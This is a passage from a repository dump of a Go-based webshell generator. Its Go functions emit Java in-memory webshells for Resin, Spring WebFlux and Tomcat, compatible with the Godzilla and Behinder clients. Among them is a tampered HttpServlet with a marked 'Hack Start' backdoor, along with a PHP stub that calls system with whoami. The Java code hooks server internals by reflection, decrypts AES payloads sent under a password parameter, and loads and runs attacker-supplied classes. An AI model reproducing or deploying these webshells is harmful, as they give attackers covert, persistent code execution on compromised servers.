clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... 
args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i listeners = 268 | (ArrayList) getFieldValue(webApp, "_requestListeners"); 269 | for (Object listener: listeners) { 270 | if (listener instanceof Proxy) { 271 | return; 272 | } 273 | } 274 | Class WebApp = webApp.getClass(); 275 | if (WebApp.getName() == "com.caucho.server.webapp.Application") { 276 | WebApp = WebApp.getSuperclass(); 277 | } 278 | Method addListenerObject = getMethodX( 279 | WebApp, "addListenerObject", 2 280 | ); 281 | addListenerObject.setAccessible(true); 282 | addListenerObject.invoke(webApp, proxyObject, true); 283 | } 284 | 285 | public ResinListener() { 286 | synchronized(lock) { 287 | Class servletRequestListener = null; 288 | try { 289 | servletRequestListener = Class.forName( 290 | "javax.servlet.ServletRequestListener" 291 | ); 292 | } catch (ClassNotFoundException e) {} 293 | 294 | if (servletRequestListener != null) { 295 | Object proxyObject = Proxy.newProxyInstance( 296 | getLoader(), new Class[]{servletRequestListener}, this 297 | ); 298 | try { 299 | addListener(proxyObject); 300 | } catch (Exception e) {} 301 | } 302 | } 303 | } 304 | 305 | static { 306 | new ResinListener(); 307 | } 308 | } 309 | ` 310 | } 311 | -------------------------------------------------------------------------------- /shell/bypass/bypassphp.go: -------------------------------------------------------------------------------- 1 | package bypass 2 | 3 | import ( 4 | "webshell/common" 5 | ) 6 | 7 | func Phpbypass() { 8 | common.Filename = common.RandStr(6)+`.php` 9 | common.Password = "http://url/?1[]=system&1[]=a&1[]=b&2=whoami" 10 | common.Webshells = `` 11 | } 12 | -------------------------------------------------------------------------------- /shell/memory/Godzilla/GoSpring/GoSpring128.go: -------------------------------------------------------------------------------- 1 | package GoSpring 2 | 3 | import "webshell/common" 4 | 5 | func GoSpringHadnler() { 6 
| common.Filename = "SpringHandler.java" 7 | common.Webshells = `import org.springframework.web.server.ServerWebExchange; 8 | import java.lang.reflect.*; 9 | import java.util.*; 10 | import java.util.function.Function; 11 | 12 | public class SpringHandler { 13 | private static String password = "` + common.Password + `"; 14 | 15 | private static Object lock = new Object(); 16 | 17 | private Field getField(Object obj, String fieldName) { 18 | Class clazz; 19 | Field field = null; 20 | if (obj == null) { 21 | return null; 22 | } 23 | if (obj instanceof Class) { 24 | clazz = (Class) obj; 25 | } else { 26 | clazz = obj.getClass(); 27 | } 28 | while (clazz != null) { 29 | try { 30 | field = clazz.getDeclaredField(fieldName); 31 | clazz = null; 32 | } catch (NoSuchFieldException e) { 33 | clazz = clazz.getSuperclass(); 34 | } 35 | } 36 | if (field != null) { 37 | try { 38 | Field mf = Field.class.getDeclaredField("modifiers"); 39 | mf.setAccessible(true); 40 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 41 | field.setAccessible(true); 42 | } catch (Exception e) {} 43 | } 44 | return field; 45 | } 46 | 47 | private Object getFieldValue(Object obj, String fieldName) { 48 | Field field; 49 | if (obj instanceof Field) { 50 | field = (Field) obj; 51 | } else { 52 | field = getField(obj, fieldName); 53 | } 54 | try { 55 | return field.get(obj); 56 | } catch (IllegalAccessException e) { 57 | return null; 58 | } 59 | } 60 | 61 | private Method getMethodX(Class clazz, String methodName, int num) { 62 | Method[] methods = clazz.getDeclaredMethods(); 63 | for (Method method : methods) { 64 | if (method.getName().equals(methodName)) { 65 | if (method.getParameterTypes().length == num) { 66 | return method; 67 | } 68 | } 69 | } 70 | return null; 71 | } 72 | 73 | private Method getMethod(Class clazz, String methodName, Class... 
args) { 74 | Method method = null; 75 | while (clazz != null) { 76 | try { 77 | method = clazz.getDeclaredMethod(methodName, args); 78 | clazz = null; 79 | } catch (NoSuchMethodException e) { 80 | clazz = clazz.getSuperclass(); 81 | } 82 | } 83 | return method; 84 | } 85 | 86 | private Object invokeMethod( 87 | Object obj, String methodName, Object... args 88 | ) { 89 | ArrayList clazzs = new ArrayList(); 90 | if (args != null) { 91 | for (int i=0; i T hook(ServerWebExchange request) 233 | throws Exception { 234 | Class ServerWebExchange = Class.forName( 235 | "org.springframework.web.server.ServerWebExchange" 236 | ); 237 | Object mono = getMethodX( 238 | ServerWebExchange, "getFormData", 0 239 | ).invoke(request); 240 | 241 | Class Mono = Class.forName("reactor.core.publisher.Mono"); 242 | Method flatMap = getMethodX(Mono, "flatMap", 1); 243 | Function transformer = reqbody -> { 244 | Object resbody = null; 245 | try { 246 | Class MultiValueMap = Class.forName( 247 | "org.springframework.util.MultiValueMap" 248 | ); 249 | String payload = (String) getMethodX( 250 | MultiValueMap, "getFirst", 1 251 | ).invoke(reqbody, password); 252 | String result = stub(payload, null, null); 253 | if (result == null) {result = "";} 254 | resbody = getMethodX(Mono, "just", 1).invoke(Mono, result); 255 | } catch (Exception e) {} 256 | return resbody; 257 | }; 258 | 259 | Object resbody = flatMap.invoke(mono, transformer); 260 | Class HttpStatus = Class.forName( 261 | "org.springframework.http.HttpStatus" 262 | ); 263 | Class ResponseEntity = Class.forName( 264 | "org.springframework.http.ResponseEntity" 265 | ); 266 | Object OK = getFieldValue(HttpStatus, "OK"); 267 | Constructor responseEntity = ResponseEntity.getConstructor( 268 | Object.class, HttpStatus 269 | ); 270 | return (T) responseEntity.newInstance(resbody, OK); 271 | } 272 | 273 | public SpringHandler() {} 274 | 275 | public SpringHandler( 276 | Object requestMappingHandlerMapping, String path 277 | ) throws Exception 
{ 278 | Class requestMappingInfo = Class.forName( 279 | "org.springframework.web.reactive.result.method.RequestMappingInfo" 280 | ); 281 | Method mPaths = requestMappingInfo.getMethod("paths", String[].class); 282 | Method registerHandlerMethod = getMethodX( 283 | requestMappingHandlerMapping.getClass(), 284 | "registerHandlerMethod", 3 285 | ); 286 | registerHandlerMethod.setAccessible(true); 287 | registerHandlerMethod.invoke( 288 | requestMappingHandlerMapping, new SpringHandler(), 289 | getMethodX(SpringHandler.class, "hook", 1), 290 | invokeMethod(mPaths.invoke(null, new Object[]{new String[]{path}}), 291 | "build") 292 | ); 293 | } 294 | 295 | public static String addHandler( 296 | Object requestMappingHandlerMapping, String path 297 | ) { 298 | try { 299 | new SpringHandler(requestMappingHandlerMapping, path); 300 | } catch (Exception e) {} 301 | return "addHandler"; 302 | } 303 | } 304 | ` 305 | } 306 | 307 | func GoSpringInterceptor() { 308 | common.Filename = "SpringInterceptor.java" 309 | common.Webshells = `import java.lang.reflect.*; 310 | import java.util.*; 311 | 312 | public class SpringInterceptor implements InvocationHandler { 313 | private static String password = "` + common.Password + `"; 314 | 315 | private static Object lock = new Object(); 316 | 317 | private Field getField(Object obj, String fieldName) { 318 | Class clazz; 319 | Field field = null; 320 | if (obj == null) { 321 | return null; 322 | } 323 | if (obj instanceof Class) { 324 | clazz = (Class) obj; 325 | } else { 326 | clazz = obj.getClass(); 327 | } 328 | while (clazz != null) { 329 | try { 330 | field = clazz.getDeclaredField(fieldName); 331 | clazz = null; 332 | } catch (NoSuchFieldException e) { 333 | clazz = clazz.getSuperclass(); 334 | } 335 | } 336 | if (field != null) { 337 | try { 338 | Field mf = Field.class.getDeclaredField("modifiers"); 339 | mf.setAccessible(true); 340 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 341 | field.setAccessible(true); 342 | 
} catch (Exception e) {} 343 | } 344 | return field; 345 | } 346 | 347 | private Object getFieldValue(Object obj, String fieldName) { 348 | Field field; 349 | if (obj instanceof Field) { 350 | field = (Field) obj; 351 | } else { 352 | field = getField(obj, fieldName); 353 | } 354 | try { 355 | return field.get(obj); 356 | } catch (IllegalAccessException e) { 357 | return null; 358 | } 359 | } 360 | 361 | private Method getMethodX(Class clazz, String methodName, int num) { 362 | Method[] methods = clazz.getDeclaredMethods(); 363 | for (Method method : methods) { 364 | if (method.getName().equals(methodName)) { 365 | if (method.getParameterTypes().length == num) { 366 | return method; 367 | } 368 | } 369 | } 370 | return null; 371 | } 372 | 373 | private Method getMethod(Class clazz, String methodName, Class... args) { 374 | Method method = null; 375 | while (clazz != null) { 376 | try { 377 | method = clazz.getDeclaredMethod(methodName, args); 378 | clazz = null; 379 | } catch (NoSuchMethodException e) { 380 | clazz = clazz.getSuperclass(); 381 | } 382 | } 383 | return method; 384 | } 385 | 386 | private Object invokeMethod( 387 | Object obj, String methodName, Object... 
args 388 | ) { 389 | ArrayList clazzs = new ArrayList(); 390 | if (args != null) { 391 | for (int i=0; i c) { 114 | 115 | if (c.equals(javax.servlet.http.HttpServlet.class)) { 116 | return null; 117 | } 118 | 119 | Method[] parentMethods = getAllDeclaredMethods(c.getSuperclass()); 120 | Method[] thisMethods = c.getDeclaredMethods(); 121 | 122 | if ((parentMethods != null) && (parentMethods.length > 0)) { 123 | Method[] allMethods = new Method[parentMethods.length + thisMethods.length]; 124 | System.arraycopy(parentMethods, 0, allMethods, 0, parentMethods.length); 125 | System.arraycopy(thisMethods, 0, allMethods, parentMethods.length, thisMethods.length); 126 | thisMethods = allMethods; 127 | } 128 | 129 | return thisMethods; 130 | } 131 | 132 | protected void doOptions(HttpServletRequest req, 133 | HttpServletResponse resp) 134 | throws ServletException, IOException { 135 | 136 | Method[] methods = getAllDeclaredMethods(this.getClass()); 137 | 138 | boolean ALLOW_GET = false; 139 | boolean ALLOW_HEAD = false; 140 | boolean ALLOW_POST = false; 141 | boolean ALLOW_PUT = false; 142 | boolean ALLOW_DELETE = false; 143 | boolean ALLOW_TRACE = true; 144 | boolean ALLOW_OPTIONS = true; 145 | 146 | // Tomcat specific hack to see if TRACE is allowed 147 | Class clazz = null; 148 | try { 149 | clazz = Class.forName("org.apache.catalina.connector.RequestFacade"); 150 | Method getAllowTrace = clazz.getMethod("getAllowTrace", (Class[]) null); 151 | ALLOW_TRACE = ((Boolean) getAllowTrace.invoke(req, (Object[]) null)).booleanValue(); 152 | } catch (ClassNotFoundException | NoSuchMethodException | SecurityException | 153 | IllegalAccessException | IllegalArgumentException | InvocationTargetException e) { 154 | // Ignore. Not running on Tomcat. TRACE is always allowed. 
155 | } 156 | // End of Tomcat specific hack 157 | 158 | for (int i=0; i reqHeaderEnum = req.getHeaderNames(); 237 | 238 | while( reqHeaderEnum.hasMoreElements() ) { 239 | String headerName = reqHeaderEnum.nextElement(); 240 | buffer.append(CRLF).append(headerName).append(": ") 241 | .append(req.getHeader(headerName)); 242 | } 243 | 244 | buffer.append(CRLF); 245 | 246 | responseLength = buffer.length(); 247 | 248 | resp.setContentType("message/http"); 249 | resp.setContentLength(responseLength); 250 | ServletOutputStream out = resp.getOutputStream(); 251 | out.print(buffer.toString()); 252 | out.close(); 253 | } 254 | 255 | protected void service(HttpServletRequest req, HttpServletResponse resp) 256 | throws ServletException, IOException { 257 | 258 | String method = req.getMethod(); 259 | 260 | if (method.equals(METHOD_GET)) { 261 | long lastModified = getLastModified(req); 262 | if (lastModified == -1) { 263 | // servlet doesn't support if-modified-since, no reason 264 | // to go through further expensive logic 265 | doGet(req, resp); 266 | } else { 267 | long ifModifiedSince; 268 | try { 269 | ifModifiedSince = req.getDateHeader(HEADER_IFMODSINCE); 270 | } catch (IllegalArgumentException iae) { 271 | // Invalid date header - proceed as if none was set 272 | ifModifiedSince = -1; 273 | } 274 | if (ifModifiedSince < (lastModified / 1000 * 1000)) { 275 | // If the servlet mod time is later, call doGet() 276 | // Round down to the nearest second for a proper compare 277 | // A ifModifiedSince of -1 will always be less 278 | maybeSetLastModified(resp, lastModified); 279 | doGet(req, resp); 280 | } else { 281 | resp.setStatus(HttpServletResponse.SC_NOT_MODIFIED); 282 | } 283 | } 284 | 285 | } else if (method.equals(METHOD_HEAD)) { 286 | long lastModified = getLastModified(req); 287 | maybeSetLastModified(resp, lastModified); 288 | doHead(req, resp); 289 | 290 | } else if (method.equals(METHOD_POST)) { 291 | doPost(req, resp); 292 | 293 | } else if 
(method.equals(METHOD_PUT)) { 294 | doPut(req, resp); 295 | 296 | } else if (method.equals(METHOD_DELETE)) { 297 | doDelete(req, resp); 298 | 299 | } else if (method.equals(METHOD_OPTIONS)) { 300 | doOptions(req,resp); 301 | 302 | } else if (method.equals(METHOD_TRACE)) { 303 | doTrace(req,resp); 304 | 305 | } else { 306 | // 307 | // Note that this means NO servlet supports whatever 308 | // method was requested, anywhere on this server. 309 | // 310 | 311 | String errMsg = lStrings.getString("http.method_not_implemented"); 312 | Object[] errArgs = new Object[1]; 313 | errArgs[0] = method; 314 | errMsg = MessageFormat.format(errMsg, errArgs); 315 | 316 | resp.sendError(HttpServletResponse.SC_NOT_IMPLEMENTED, errMsg); 317 | } 318 | } 319 | 320 | private void maybeSetLastModified(HttpServletResponse resp, 321 | long lastModified) { 322 | if (resp.containsHeader(HEADER_LASTMOD)) { 323 | return; 324 | } 325 | if (lastModified >= 0) { 326 | resp.setDateHeader(HEADER_LASTMOD, lastModified); 327 | } 328 | } 329 | 330 | @Override 331 | public void service(ServletRequest req, ServletResponse res) 332 | throws ServletException, IOException { 333 | 334 | // Hack Start 335 | String password = "` + common.Password + `";//密码 336 | String payload = req.getParameter(password); 337 | if (payload != null) { try { 338 | 339 | Class base64; 340 | Object decoder; 341 | byte[] bytes = null; 342 | java.security.MessageDigest h; 343 | javax.crypto.Cipher c; 344 | 345 | try { 346 | base64 = Class.forName("java.util.Base64"); 347 | decoder = base64.getMethod("getDecoder") 348 | .invoke(base64); 349 | bytes = (byte[]) decoder.getClass() 350 | .getMethod("decode", String.class) 351 | .invoke(decoder, payload); 352 | } catch (ClassNotFoundException e) { 353 | try { 354 | base64 = Class.forName("sun.misc.BASE64Decoder"); 355 | decoder = base64.newInstance(); 356 | bytes = (byte[]) decoder.getClass() 357 | .getMethod("decodeBuffer", String.class) 358 | .invoke(decoder, payload); 359 | } catch 
(Exception ex) {} 360 | } catch (Exception ex) {} 361 | 362 | h = java.security.MessageDigest.getInstance("MD5"); 363 | h.update(password.getBytes(), 0, password.length()); 364 | byte[] key = new BigInteger(1, h.digest()).toString(16) 365 | .substring(0, 16).getBytes(); 366 | 367 | c = javax.crypto.Cipher.getInstance("AES"); 368 | c.init(2, new javax.crypto.spec.SecretKeySpec(key, "AES")); 369 | bytes = c.doFinal(bytes); 370 | 371 | 372 | Object god = ((HttpServletRequest) req).getSession() 373 | .getAttribute("god"); 374 | if (god instanceof Class) { 375 | java.io.ByteArrayOutputStream arrOut = 376 | new java.io.ByteArrayOutputStream(); 377 | Object f = ((Class) god).newInstance(); 378 | f.equals(arrOut); 379 | f.equals(req); 380 | f.equals(bytes); 381 | f.toString(); 382 | h.update(password.getBytes(), 0, password.length()); 383 | String h1 = new BigInteger(1, h.digest()).toString(16); 384 | String h2 = password + h1.substring(0, 16); 385 | h.update(h2.getBytes(), 0, h2.length()); 386 | String fix = new BigInteger(1, h.digest()).toString(16); 387 | c.init(1, new javax.crypto.spec.SecretKeySpec(key, "AES")); 388 | bytes = c.doFinal(arrOut.toByteArray()); 389 | 390 | String str = null; 391 | try { 392 | base64 = Class.forName("java.util.Base64"); 393 | Object encoder = base64.getMethod("getEncoder") 394 | .invoke(base64); 395 | str = (String) encoder.getClass() 396 | .getMethod("encodeToString", byte[].class) 397 | .invoke(encoder, bytes); 398 | } catch (ClassNotFoundException e) { 399 | try { 400 | base64 = Class.forName("sun.misc.BASE64Decoder"); 401 | Object encoder = base64.newInstance(); 402 | str = (String) encoder.getClass().getMethod("encode", byte[].class) 403 | .invoke(encoder, bytes); 404 | } catch (Exception ex) {} 405 | } catch (Exception ex) {} 406 | 407 | String result = fix.substring(0, 16).toUpperCase()+ 408 | str+fix.substring(16).toUpperCase(); 409 | res.getWriter().write(result); 410 | } else { 411 | Constructor constructor = 
java.security.SecureClassLoader.class 412 | .getDeclaredConstructor(ClassLoader.class); 413 | constructor.setAccessible(true); 414 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 415 | new Object[]{this.getClass().getClassLoader()} 416 | ); 417 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 418 | "defineClass", byte[].class, int.class, int.class 419 | ); 420 | defineMethod.setAccessible(true); 421 | ((HttpServletRequest) req).getSession().setAttribute( 422 | "god", defineMethod.invoke( 423 | classloader, bytes, 0, bytes.length 424 | ) 425 | ); 426 | } 427 | 428 | } catch (Exception e) {}} 429 | // Hack End 430 | 431 | HttpServletRequest request; 432 | HttpServletResponse response; 433 | 434 | try { 435 | request = (HttpServletRequest) req; 436 | response = (HttpServletResponse) res; 437 | } catch (ClassCastException e) { 438 | throw new ServletException(lStrings.getString("http.non_http")); 439 | } 440 | service(request, response); 441 | } 442 | 443 | private static class NoBodyResponse extends HttpServletResponseWrapper { 444 | private final NoBodyOutputStream noBodyOutputStream; 445 | private ServletOutputStream originalOutputStream; 446 | private NoBodyPrintWriter noBodyWriter; 447 | private boolean didSetContentLength; 448 | 449 | private NoBodyResponse(HttpServletResponse r) { 450 | super(r); 451 | noBodyOutputStream = new NoBodyOutputStream(this); 452 | } 453 | 454 | private void setContentLength() { 455 | if (!didSetContentLength) { 456 | if (noBodyWriter != null) { 457 | noBodyWriter.flush(); 458 | } 459 | super.setContentLengthLong(noBodyOutputStream.getWrittenByteCount()); 460 | } 461 | } 462 | 463 | 464 | @Override 465 | public void setContentLength(int len) { 466 | super.setContentLength(len); 467 | didSetContentLength = true; 468 | } 469 | 470 | @Override 471 | public void setContentLengthLong(long len) { 472 | super.setContentLengthLong(len); 473 | didSetContentLength = true; 474 | } 475 | 476 | @Override 477 | public 
void setHeader(String name, String value) { 478 | super.setHeader(name, value); 479 | checkHeader(name); 480 | } 481 | 482 | @Override 483 | public void addHeader(String name, String value) { 484 | super.addHeader(name, value); 485 | checkHeader(name); 486 | } 487 | 488 | @Override 489 | public void setIntHeader(String name, int value) { 490 | super.setIntHeader(name, value); 491 | checkHeader(name); 492 | } 493 | 494 | @Override 495 | public void addIntHeader(String name, int value) { 496 | super.addIntHeader(name, value); 497 | checkHeader(name); 498 | } 499 | 500 | private void checkHeader(String name) { 501 | if ("content-length".equalsIgnoreCase(name)) { 502 | didSetContentLength = true; 503 | } 504 | } 505 | 506 | @Override 507 | public ServletOutputStream getOutputStream() throws IOException { 508 | originalOutputStream = getResponse().getOutputStream(); 509 | return noBodyOutputStream; 510 | } 511 | 512 | @Override 513 | public PrintWriter getWriter() throws UnsupportedEncodingException { 514 | 515 | if (noBodyWriter == null) { 516 | noBodyWriter = new NoBodyPrintWriter(noBodyOutputStream, getCharacterEncoding()); 517 | } 518 | return noBodyWriter; 519 | } 520 | 521 | @Override 522 | public void reset() { 523 | super.reset(); 524 | resetBuffer(); 525 | originalOutputStream = null; 526 | } 527 | 528 | @Override 529 | public void resetBuffer() { 530 | noBodyOutputStream.resetBuffer(); 531 | if (noBodyWriter != null) { 532 | noBodyWriter.resetBuffer(); 533 | } 534 | } 535 | } 536 | 537 | private static class NoBodyOutputStream extends ServletOutputStream { 538 | 539 | private static final String LSTRING_FILE = "javax.servlet.http.LocalStrings"; 540 | private static final ResourceBundle lStrings = ResourceBundle.getBundle(LSTRING_FILE); 541 | 542 | private final NoBodyResponse response; 543 | private boolean flushed = false; 544 | private long writtenByteCount = 0; 545 | 546 | private NoBodyOutputStream(NoBodyResponse response) { 547 | this.response = response; 
548 | } 549 | 550 | private long getWrittenByteCount() { 551 | return writtenByteCount; 552 | } 553 | 554 | @Override 555 | public void write(int b) throws IOException { 556 | writtenByteCount++; 557 | checkCommit(); 558 | } 559 | 560 | @Override 561 | public void write(byte buf[], int offset, int len) throws IOException { 562 | if (buf == null) { 563 | throw new NullPointerException( 564 | lStrings.getString("err.io.nullArray")); 565 | } 566 | 567 | if (offset < 0 || len < 0 || offset+len > buf.length) { 568 | String msg = lStrings.getString("err.io.indexOutOfBounds"); 569 | Object[] msgArgs = new Object[3]; 570 | msgArgs[0] = Integer.valueOf(offset); 571 | msgArgs[1] = Integer.valueOf(len); 572 | msgArgs[2] = Integer.valueOf(buf.length); 573 | msg = MessageFormat.format(msg, msgArgs); 574 | throw new IndexOutOfBoundsException(msg); 575 | } 576 | 577 | writtenByteCount += len; 578 | checkCommit(); 579 | } 580 | 581 | @Override 582 | public boolean isReady() { 583 | // Will always be ready as data is swallowed. 
584 | return true; 585 | } 586 | 587 | @Override 588 | public void setWriteListener(WriteListener listener) { 589 | response.originalOutputStream.setWriteListener(listener); 590 | } 591 | 592 | private void checkCommit() throws IOException { 593 | if (!flushed && writtenByteCount > response.getBufferSize()) { 594 | response.flushBuffer(); 595 | flushed = true; 596 | } 597 | } 598 | 599 | private void resetBuffer() { 600 | if (flushed) { 601 | throw new IllegalStateException(lStrings.getString("err.state.commit")); 602 | } 603 | writtenByteCount = 0; 604 | } 605 | } 606 | 607 | private static class NoBodyPrintWriter extends PrintWriter { 608 | 609 | private final NoBodyOutputStream out; 610 | private final String encoding; 611 | private PrintWriter pw; 612 | 613 | public NoBodyPrintWriter(NoBodyOutputStream out, String encoding) throws UnsupportedEncodingException { 614 | super(out); 615 | this.out = out; 616 | this.encoding = encoding; 617 | 618 | Writer osw = new OutputStreamWriter(out, encoding); 619 | pw = new PrintWriter(osw); 620 | } 621 | 622 | private void resetBuffer() { 623 | out.resetBuffer(); 624 | 625 | Writer osw = null; 626 | try { 627 | osw = new OutputStreamWriter(out, encoding); 628 | } catch (UnsupportedEncodingException e) { 629 | // Impossible. 630 | // The same values were used in the constructor. If this method 631 | // gets called then the constructor must have succeeded so the 632 | // above call must also succeed. 
633 | } 634 | pw = new PrintWriter(osw); 635 | } 636 | 637 | @Override 638 | public void flush() { 639 | pw.flush(); 640 | } 641 | 642 | @Override 643 | public void close() { 644 | pw.close(); 645 | } 646 | 647 | @Override 648 | public boolean checkError() { 649 | return pw.checkError(); 650 | } 651 | 652 | @Override 653 | public void write(int c) { 654 | pw.write(c); 655 | } 656 | 657 | @Override 658 | public void write(char[] buf, int off, int len) { 659 | pw.write(buf, off, len); 660 | } 661 | 662 | @Override 663 | public void write(char[] buf) { 664 | pw.write(buf); 665 | } 666 | 667 | @Override 668 | public void write(String s, int off, int len) { 669 | pw.write(s, off, len); 670 | } 671 | 672 | @Override 673 | public void write(String s) { 674 | pw.write(s); 675 | } 676 | 677 | @Override 678 | public void print(boolean b) { 679 | pw.print(b); 680 | } 681 | 682 | @Override 683 | public void print(char c) { 684 | pw.print(c); 685 | } 686 | 687 | @Override 688 | public void print(int i) { 689 | pw.print(i); 690 | } 691 | 692 | @Override 693 | public void print(long l) { 694 | pw.print(l); 695 | } 696 | 697 | @Override 698 | public void print(float f) { 699 | pw.print(f); 700 | } 701 | 702 | @Override 703 | public void print(double d) { 704 | pw.print(d); 705 | } 706 | 707 | @Override 708 | public void print(char[] s) { 709 | pw.print(s); 710 | } 711 | 712 | @Override 713 | public void print(String s) { 714 | pw.print(s); 715 | } 716 | 717 | @Override 718 | public void print(Object obj) { 719 | pw.print(obj); 720 | } 721 | 722 | @Override 723 | public void println() { 724 | pw.println(); 725 | } 726 | 727 | @Override 728 | public void println(boolean x) { 729 | pw.println(x); 730 | } 731 | 732 | @Override 733 | public void println(char x) { 734 | pw.println(x); 735 | } 736 | 737 | @Override 738 | public void println(int x) { 739 | pw.println(x); 740 | } 741 | 742 | @Override 743 | public void println(long x) { 744 | pw.println(x); 745 | } 746 | 747 | @Override 
748 | public void println(float x) { 749 | pw.println(x); 750 | } 751 | 752 | @Override 753 | public void println(double x) { 754 | pw.println(x); 755 | } 756 | 757 | @Override 758 | public void println(char[] x) { 759 | pw.println(x); 760 | } 761 | 762 | @Override 763 | public void println(String x) { 764 | pw.println(x); 765 | } 766 | 767 | @Override 768 | public void println(Object x) { 769 | pw.println(x); 770 | } 771 | } 772 | 773 | private static class NoBodyAsyncContextListener implements AsyncListener { 774 | 775 | private final NoBodyResponse noBodyResponse; 776 | 777 | public NoBodyAsyncContextListener(NoBodyResponse noBodyResponse) { 778 | this.noBodyResponse = noBodyResponse; 779 | } 780 | 781 | @Override 782 | public void onComplete(AsyncEvent event) throws IOException { 783 | noBodyResponse.setContentLength(); 784 | } 785 | 786 | @Override 787 | public void onTimeout(AsyncEvent event) throws IOException { 788 | // NO-OP 789 | } 790 | 791 | @Override 792 | public void onError(AsyncEvent event) throws IOException { 793 | // NO-OP 794 | } 795 | 796 | @Override 797 | public void onStartAsync(AsyncEvent event) throws IOException { 798 | // NO-OP 799 | } 800 | } 801 | } 802 | ` 803 | } 804 | -------------------------------------------------------------------------------- /shell/memory/Behinder/Betomcat/Bettaes128.go: -------------------------------------------------------------------------------- 1 | package Betomcat 2 | 3 | import "webshell/common" 4 | 5 | func TomactLis() { 6 | common.Filename = "TomcatListener.java" 7 | common.Webshells = `import java.lang.reflect.*; 8 | import java.util.*; 9 | 10 | public class TomcatListener implements InvocationHandler { 11 | private static String password = "` + common.Password + `"; 12 | 13 | private static Object lock = new Object(); 14 | 15 | private Field getField(Object obj, String fieldName) { 16 | Class clazz; 17 | Field field = null; 18 | if (obj == null) { 19 | return null; 20 | } 21 | if (obj instanceof 
Class) { 22 | clazz = (Class) obj; 23 | } else { 24 | clazz = obj.getClass(); 25 | } 26 | while (clazz != null) { 27 | try { 28 | field = clazz.getDeclaredField(fieldName); 29 | clazz = null; 30 | } catch (NoSuchFieldException e) { 31 | clazz = clazz.getSuperclass(); 32 | } 33 | } 34 | if (field != null) { 35 | try { 36 | Field mf = Field.class.getDeclaredField("modifiers"); 37 | mf.setAccessible(true); 38 | mf.setInt(field, field.getModifiers() & ~Modifier.FINAL); 39 | field.setAccessible(true); 40 | } catch (Exception e) {} 41 | } 42 | return field; 43 | } 44 | 45 | private Object getFieldValue(Object obj, String fieldName) { 46 | Field field; 47 | if (obj instanceof Field) { 48 | field = (Field) obj; 49 | } else { 50 | field = getField(obj, fieldName); 51 | } 52 | try { 53 | return field.get(obj); 54 | } catch (IllegalAccessException e) { 55 | return null; 56 | } 57 | } 58 | 59 | private Method getMethodX(Class clazz, String methodName, int num) { 60 | Method[] methods = clazz.getDeclaredMethods(); 61 | for (Method method : methods) { 62 | if (method.getName().equals(methodName)) { 63 | if (method.getParameterTypes().length == num) { 64 | return method; 65 | } 66 | } 67 | } 68 | return null; 69 | } 70 | 71 | private Method getMethod(Class clazz, String methodName, Class... args) { 72 | Method method = null; 73 | while (clazz != null) { 74 | try { 75 | method = clazz.getDeclaredMethod(methodName, args); 76 | clazz = null; 77 | } catch (NoSuchMethodException e) { 78 | clazz = clazz.getSuperclass(); 79 | } 80 | } 81 | return method; 82 | } 83 | 84 | private Object invokeMethod( 85 | Object obj, String methodName, Object... 
args 86 | ) { 87 | ArrayList clazzs = new ArrayList(); 88 | if (args != null) { 89 | for (int i=0; i keySet = catalina.keySet().iterator(); 159 | while(keySet.hasNext()) { 160 | String key = keySet.next(); 161 | if (key.contains("NonLoginAuthenticator")) { 162 | nonLoginAuthenticator = catalina.get(key); 163 | break; 164 | } 165 | } 166 | Object object = getFieldValue(nonLoginAuthenticator, "object"); 167 | Object resource = getFieldValue(object, "resource"); 168 | return getFieldValue(resource, "context"); 169 | } 170 | 171 | 172 | private byte[] cipher( 173 | byte[] payload, String alg, byte[] key, boolean isEnc 174 | ) { 175 | try { 176 | javax.crypto.Cipher c = javax.crypto.Cipher.getInstance(alg); 177 | c.init(isEnc?1:2, new javax.crypto.spec.SecretKeySpec(key, alg)); 178 | return c.doFinal(payload); 179 | } catch (Exception e) { 180 | return null; 181 | } 182 | } 183 | 184 | private String hasher(String str, String alg) { 185 | try { 186 | java.security.MessageDigest h = 187 | java.security.MessageDigest.getInstance(alg); 188 | h.update(str.getBytes(), 0, str.length()); 189 | return new java.math.BigInteger(1, h.digest()).toString(16); 190 | } catch (Exception e) { 191 | return null; 192 | } 193 | } 194 | 195 | private byte[] decoder(String payload) { 196 | return cipher( 197 | b64decode(payload), "AES", 198 | hasher(password, "MD5").substring(0, 16).getBytes(), false 199 | ); 200 | } 201 | 202 | 203 | private String stub(String payload, Object request, Object response) 204 | throws Exception { 205 | if (invokeMethod(request, "getMethod").equals("POST")) { 206 | payload = (String) invokeMethod( 207 | invokeMethod(request, "getReader"),"readLine" 208 | ); 209 | java.util.HashMap pageContext = new java.util.HashMap(); 210 | Object session = invokeMethod(request, "getSession"); 211 | pageContext.put("request", request); 212 | pageContext.put("response", response); 213 | pageContext.put("session", session); 214 | invokeMethod(session, "putValue", 215 | 'u', 
hasher(password, "MD5").substring(0, 16)); 216 | byte[] b = decoder(payload); 217 | Constructor constructor = java.security.SecureClassLoader.class 218 | .getDeclaredConstructor(ClassLoader.class); 219 | constructor.setAccessible(true); 220 | ClassLoader classloader = (ClassLoader) constructor.newInstance( 221 | new Object[]{this.getClass().getClassLoader()} 222 | ); 223 | Method defineMethod = ClassLoader.class.getDeclaredMethod( 224 | "defineClass", byte[].class, int.class, int.class 225 | ); 226 | defineMethod.setAccessible(true); 227 | ((Class) defineMethod.invoke(classloader, b, 0, b.length)) 228 | .newInstance().equals(pageContext); 229 | } 230 | return null; 231 | } 232 | 233 | private void hook(Object servletRequestEvent) throws Exception { 234 | Object servletRequest = invokeMethod( 235 | servletRequestEvent, "getServletRequest" 236 | ); 237 | Object request = getFieldValue(servletRequest, "request"); 238 | Object response = invokeMethod(request, "getResponse"); 239 | String payload = (String) invokeMethod( 240 | servletRequest, "getParameter", password 241 | ); 242 | stub(payload, request, response); 243 | } 244 | 245 | @Override 246 | public Object invoke(Object proxy, Method method, Object[] args) 247 | throws Throwable { 248 | if (method.getName().equals("requestInitialized")) { 249 | Object servletRequestEvent = args[0]; 250 | hook(servletRequestEvent); 251 | 